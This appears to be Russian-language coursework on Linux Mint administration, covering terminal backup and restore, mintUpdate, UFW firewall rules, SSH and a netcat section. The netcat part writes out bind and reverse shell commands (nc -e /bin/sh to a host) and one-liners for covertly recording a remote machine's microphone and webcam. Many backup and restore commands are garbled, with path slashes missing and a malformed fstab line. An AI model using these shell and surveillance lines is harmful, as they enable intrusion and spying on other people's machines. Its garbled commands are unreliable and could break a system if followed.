Рисунок 2.9 - Восстановление файлов
Если резервные копии данных сохранены в виде архива, следует выбрать «Архив», в противном случае - «Папка» и указать архив, либо место, где было сохранено резервную копию данных. Далее выбрать новую домашнюю папку в которую будут сохранены восстановленные файлы.
При восстановлении программ следует выбрать резервные копии программного обеспечения выбора файла. В следующем окне будет показан список пакетов один из которых следует выбрать. Этот список содержит только пакеты, которые были частью предыдущего выбора программного обеспечения и которые не установлены в нынешней системе. Пакеты, которые уже установлены в новой системе не нужно устанавливать снова, так что они не появляются в этом списке.
Также в Linux Mint можно создать резервные копии при помощи терминала. Для этого необходимо использовать следующие команды.fdisk-l
чтобы вывести список всех доступных жестких дисков
Сперва нужно сделать монтирование разделов на Linux Mint, для этого выполняется командаmkdir Backup
Как результат будет создана папка Backup.
Теперь нужно примонтировать этот раздел, для этого выполняется следующее:
sudo mount dev sdbX media backup
,где Х-номер раздела для бэкапа.
Теперь примонтирование папки Backup в media /Backup выполнено.
Далее следует создать директории, которые желательно использовать для резервного копирования. Для этого набираются в терминале данные команды:gedit media backup exclude/*/*/*
Данные три директории обязательны.
Далее необходимо перейти в папку Backup для последующих операций.cd media backup
Теперь приступаем непосредственно к процессу резервного копирования
sudo tar -X media backup exclude -czf /media backup backup.tgz
Буква Х - обозначает путь к файлу, исключающего список директорий, для резервного копирования.
Команда -сzf - создание архиваgzip - способ упаковки файла- путь к архиву.
Восстановление системы Linux Mint из резервной копииfdisk -l mkdir * (создаёт нужную папку)mount dev sd** (где ** указывается номер накопителя) media * указанная папкаcd media (переход в папку на съемном носителе)
На данном этапе действий, нужно обязательно перейти в раздел, куда будут распакованы данныеcp каталог с бэкапом [папка, куда будет распаковываться бэкап] (квадратные скобки обязательны!)
(Cp=это команда копирования в Linux-системах)
Команда распаковки выглядит так:tar -xzpsf backup.tgz
После того как данные были распакованы, нужно установить «загрузчик» (загрузчик для системы и отредактировать важные файлы для восстановления работы системы).
sudo grub-install-root directory=/media/backup dev sda
(media backup - это папка с резервной копией)
Нужно узнать идентификаторы разделов, воспользуясь командой
sudo ls -l dev disk by-uuid
Нужно скопировать идентификатор и отредактировать нужные файлы. Выполняется команда
sudo gedit boot grub grub.cfg
Во время ввода описанной выше команды необходимо находится в папке куда был распакован архив.
Здесь нужно с помощью редактора gedit заменить uuid-идентификаторы на новые. Далее следует редактировать еще один файл.gedit etc fstab
И добавить строку:
sudo dev sda* none swap sw 0 0
Вместо dev sda* , следует указать раздел с
подкачкой «SWAP» Узнать «свап-раздел» командой fdisk -l и теперь подключить
его, используя командуdev sda*
.6 mintUpdate
Программа MintUpdate предназначена для поддержания системы в актуальном состоянии. Множество настроек делают обновление пакетов удобным для каждого частного случая. Обновления отсортированы по уровню важности, существует возможность редактирования источников и прокси-серверов, просмотр истории обновлений и множество других приятных функций.
Здесь некоторых пояснений требуют первые две колонки. Первая - тип обновления. Их два - стандартно обновляемые пакеты по выходе их новой сборки или версии (отмечены серой стрелкой) и обновления безопасности, ликвидирующие выявленные "дыры" в них (отмечены красным восклицательным знаком).
Во второй колонке указывается уровень безопасности обновления пакетов. Здесь под безопасностью понимается не вероятность использования их злодеями, а то, как обновление пакета может повлиять на общую стабильность системы. Уровней безопасности в этом смысле пять:
Сертифицированные пакеты - обычно те, что непосредственно поддерживаются майнтайнерами Mint.
Рекомендуемые пакеты - проверены и одобрены разработчиками данного дистрибутива.
Безопасные пакеты - не проверялись разработчиками, но нарушение стабильности системы при их обновлении очень маловероятно.
Небезопасные пакеты потенциально могут повлиять на стабильность системы.
Опасные пакеты при некоторых условиях могут
привести к нестабильности системы.
Рисунок 2.10 - Менеджер обновлений
По умолчанию отмечены для обновления (третья колонка) пакет уровней 1-3. Для пакетов уровней 4-5 это нужно сделать принудительно. Если оно, конечно, нужно, в чём я лично не всегда уверен:
Само по себе обновление выполняется нажатием
экранной кнопки «Установить обновления» и начинается после ввода
пользовательского пароля. Развернув пункт «Show individual files», можно
наблюдать за ходом процесса в деталях (если, конечно, больше заняться нечем).
3.СЕТЕВАЯ БЕЗОПАСНОСТЬ В ОС LINUX MINT
В операционной системе Linux Mint в качестве
фильтра пакетов используется Netfilter, который входит в состав ядра и
разрабатывается группой Netfilter Core Team. Для управления его настройками
используется утилита командной строки iptables, разрабатываемая параллельно
этим же проектом. Процесс настройки требует некоторого понимания протоколов,
используемых при обмене информации в Интернете, и назвать его простым нельзя.
Хотя тема настройки netfilter/iptables уже не является новой, в глобальной сети
можно найти не один десяток документов, описывающих как его устройство, так и
сами команды.
.1 Межсетевой экран в Linux Mint
Кроме этого написано несколько хороших графических утилит (КМуFirewall, Firewall Builder, Firestarter и др.), помогающих самостоятельно создавать правила неподготовленному пользователю. В Ubuntu, начиная с версии 8.04, для управления правилами netfilter используется UFW (Uncomplicated firewall), поэтому процесс настройки здесь выглядит несколько иначе, чем в других дистрибутивах. Позже UFW перекочевал в другие дистрибутивы, в том числе и в Linux Mint. Важно понять, что UFW не заменяет iptables, а является лишь удобной высокоуровневой надстройкой над этой утилитой. Процесс создания новых правил планируется сделать максимально понятным для обычного пользователя. Кроме этого упрощена интеграция приложений с межсетевым экраном. Разработчик может создавать готовые правила, которые будут автоматически активироваться при установке сервиса, разрешая нужные сетевые соединения.
По умолчанию UFW всегда отключен, и перед запуском демона его необходимо актировать, заменив в файле /etc/ufw/ufw.conf строку=no=yes
Иначе при попытке его запуска командой
sudo /etc/init.d/ufw start
будет получен отказ.
Кроме непосредственного редактирования конфигурационных файлов настройки можно производить при помощи консольной утилиты ufw. Например, чтобы активировать uwf и разрешить ее загрузку, при старте системы можно поступить следующим образом:ufw enable
Отключить также просто:ufw disable
Существует две глобальные политики: все разрешено и все запрещено. Первая активируется при помощи командыufw default allow
Политика по умолчанию incoming изменена на allow.
Чтобы запретить все подключения, используется командаufw default deny
При помощи ufw очень просто разрешить или запретить входящие соединения для сервиса, описанного в /etc/services, или конкретного порта/протокола.
В общем случае команда выглядит так:allow | deny [ service ]
Иными словами, чтобы разрешить подключение к веб-серверу, работающему на 80-м порту, необходимо поступить следующим образом:ufw allow 80 / tcp
Чтобы просмотреть правила iptables без их активации, необходимо добавить в команду параметр - -dry-run. Параметр status позволит узнать текущие настройки UFW без заглядывания внутрь iptables:ufw status
Удалить разрешение на подключение к выбранному порту можно так же просто:ufw delete allow 80/tcp
Запрещающее правило создается аналогично разрешающему, только вместо allow используется deny:ufw deny 53
Теперь был блокирован доступ к 53-му порту. При этом если ранее было создано, например, разрешающее правило, которое теперь нужно заменить на блокирующее, то это лучше производить в два этапа. Вначале отключается первое правило, а затем устанавливается второе.
Вместо номера порта можно назвать сервис по имени. Необходимо узнать как называется нужный сервис:/etc/services | less
В правилах UFW можно задавать IP-адреса (источника и назначения). Например, чтобы разрешить подключение с внутренней сети 192.168.1.0/24, используется:ufw allow 192.168.1.0/24
или запрещающее правило:ufw deny from 10.20.30.40
Опционально можно указать порт и протокол. Для того чтобы разрешить подключение по SSH только с одного IP-адреса следует ввести следующую команду:
sudo ufw allow from 192.168.0.20 to any port 22
Для включения/отключения регистрации используется команда logging. ufw logging on
Файл /etc/ufw/sysctl.conf задает некоторые системные переменные (аналог общесистемного /etc/sysctl.conf). Например, чтобы разрешить перенаправление пакетов, снимается комментарий со строки/ipv4/ip_forward=1
В состав Linux Mint включен и графический
интерфейс UFW - GUFW
Рисунок 3.1 - GUFW
Для запуска GUFW используется команда:gufw
Первым делом следует изменить статус работы фаервола на «Включен». Но следует учесть: на дефолтных настройках входящая информация из интернета запрещена, а исходящая проверяется. Таким образом, весь трафик станет напоминать улицу с односторонним движением.
Также можно создать развернутые правила, например, для специфических задач. Следует обратить внимание на первую из трех вкладок «Правила». В ней задаются правила всестороннего интернет движения для приложений вроде torrent и Skype. К сожалению, не все трудности преодолеваются путем фиксации распоряжений для списка предустановленных приложений. Помимо вышеупомянутого, можно оставить ценные целевые указания целому списку хостов и IP адресов, а также направлений соединений.
Если после всех путешествий по настройкам
безопасности системы через фаервол, можно сделать вывод, что все возможное уже
сделано, останется последний сервисный штрих - прописать UFW в автозагрузку.
Нужно запустить в терминале команду:update-rc.d ufw defaults
.2 Удаленное управление
Потребность в удаленном управлении возникла с момента появления сети и систем, которые необходимо было администрировать на расстоянии.
Существует несколько очень распространенных протоколов удаленного администрирования, позволяющих управлять системой посредством сети. Самым старым и самым распространенным, но в то же время самым небезопасным, является протокол Telnet. Это самый первый протокол удаленного взаимодействия, появившийся на заре развития вычислительных сетей, когда проблеме безопасности при передаче информации не уделялось практически никакого внимания. При передаче информации по протоколу Telnet все данные передаются в открытом незашифрованном виде, в том числе имена и пароли пользователей. Любой, даже малоопытный в компьютерных делах, пользователь, имея программу под общим названием network sniffer (с англ. «сетевой анализатор пакетов»), может получить имя и пароль при передаче их по сети.
Помимо протокола Telnet в UNIX-системах существует целое семейство так называемых r-программ. К ним относятся rsh, rlogin (начальная буква r трактуется как remote) и другие, позволяющие производить различные операции, связанные с удаленным администрированием. Однако уровень безопасности при использовании r-программ, как и уровень безопасности при использовании Telnet, также оставляет желать лучшего.
Существует еще один протокол для управления некоторыми параметрами системы и получения информации о ней. Это протокол SNMP (Simple Network Management Protocol). Протокол SNMP имеет ограниченный спектр возможностей и не лишен тех же недостатков в плане безопасности, что и протокол Telnet.
Эти протоколы могут служить хорошим решением для таких локальных сетей, где требования, предъявляемые к безопасности, являются не очень высокими. Однако, при передаче данных по такой сети, как Интернет, где пакет, прежде чем достичь адресата, проходит несколько небезопасных узлов, их использование может служить потенциальной угрозой безопасности и основной причиной успешного проникновения в систему.
На сегодняшний день одним из самых
распространенных и безопасных протоколов удаленного администрирования,
использующих шифрование при передаче данных, является протокол SSH (Secure
SHell). В протоколе SSH для организации безопасного доступа применяется
процедура аутентификации с использованием асимметричного шифрования с открытым
ключом. Это обеспечивает более высокую безопасность, чем при использовании
симметричного шифрования, хотя и порождает дополнительную вычислительную
нагрузку. При последующем обмене данными применяется уже симметричное
шифрование, более экономичное в смысле затрат процессорного времени. Также SSH
поддерживает возможность работы с уже упомянутым протоколом Telnet, безопасную работу
по протоколу графического уровня X11, благодаря возможности перенаправления
соответствующих данных по надежным SSH-каналам, предоставляет безопасную замену
многим r-программам UNIX, с которыми традиционно связаны проблемы обеспечения
безопасности.
.3 Netcat
- это сетевой инструмент, замену которому вряд ли можно найти. Обладая предельной простотой, он невероятно богат на функционал, а диапазон его применения столь широк, что в народе netcat окрестили «Швейцарским армейским ножом».
Утилита netcat по сути не делает ничего, кроме копирования данных в сетевой порт и из него, но при этом с ее помощью можно:
. Передавать файлы (первую команду выполняем на принимающей машине, вторую - на передающей:-l 31334 > filename nc 172.16.69.143 31334 < filename
. Удаленно читать логи (первая - сервер, вторая - клиент):
nc -f /var/log/messages | nc -l 31334 nc 172.16.69.143 31334
3. Использовать вместо telnet (первая - telnet-сервер, вторая - клиент):
nc -l -p 31334 -e /bin/sh nc 172.16.69.143 31334
4. Сканировать на открытые порты:-z execbit.ru 1-1024
. Осуществлять фингерпринт сервисов на основе баннеров:
echo "QUIT" | nc execbit.ru 1-1024
6. Организовывать обратный шелл (первая - клиент, вторая - сервер, однако шелл откроется от сервера к клиенту):
nc -e /bin/sh 172.16.69.143 31334 nc -l -p 31334
7. Делать микрофонную запись с удаленной машины (сервер, клиент):
arecord -f dat -t raw | nc -l 31337 nc 172.16.69.143 31337 | oggenc - -r -o nc.ogg
8. Получать снимки с web-камеры удаленной машины (сервер, клиент):
while [ 1 ]; do streamer -o /tmp/photo.jpeg; nc -l 31337 < /tmp/photo.jpeg; done nc localhost 31337 > photo.jpeg
Однако важно понимать, что существует несколько версий Netcat, поведение которых может отличаться. Экземпляр, поставляемый с дистрибутивами Linux, - это оригинал, доживший до наших дней. Все пять приведенных примеров он отработает без проблем. Версия под названием GNU Netcat не поддерживает опции -e, поэтому второй и пятый примеры она не воспримет.
Особого внимания заслуживает Netcat, распространяемый вместе с BSD-системами, опция -e в нем есть, но предназначена она для шифрования входящего и исходящего трафика методом IPSec ESP:
nc -e 'in ipsec esp/transport//require' -e 'out ipsec esp/transport//require' \172.16.69.143 31334
Кроме того, BSD Netcat способен подключаться к удаленной машине через прокси:-x172.16.64.1:8080 -Xconnect 172.16.69.143 31334
В этом примере прокси находится по адресу 172.16.64.1:8080, а флаг -Xconnect говорит о том, что он работает с протоколом HTTP. Также поддерживаются SOCKS версий 4 и 5, но о них следует информировать netcat через флаг -X4 или -X5.
Сам Netcat легко использовать в качестве прокси или редиректора портов, но в этом случае его лучше связать с демоном inetd:
echo 'redirect-2525-to-25 2525/tcp' >> /etc/services echo 'redirect-2525-to-25 stream tcp nowait nobody /usr/bin/nc nc -w 2 127.0.0.1 25' \ >> /etc/inetd.conf
killall -HUP inetd
Теперь весь трафик, пришедший на порт 2525, будет перенаправляться на стандартный 25-й SMTP-порт. Таким же образом мы можем завернуть трафик с любого порта на другой порт/машину, просто видоизменив первые две команды.
Кстати, пользователи дистрибутивов Linux могут
вообще не заморачиваться с Netcat: ведь демон xinetd, ставший стандартом в
Linux-системах, сам умеет перенаправлять сетевой трафик.
.4 Программное средство контроля
Чаще всего в этом сегменте используются возможности антивирусов. Их linux-версии, как правило, лишены таких модулей, поэтому не способствуют решению проблемы. Если на чем-то стоит акцентировать внимание, то подойдут специальные программы, такие как Nanny.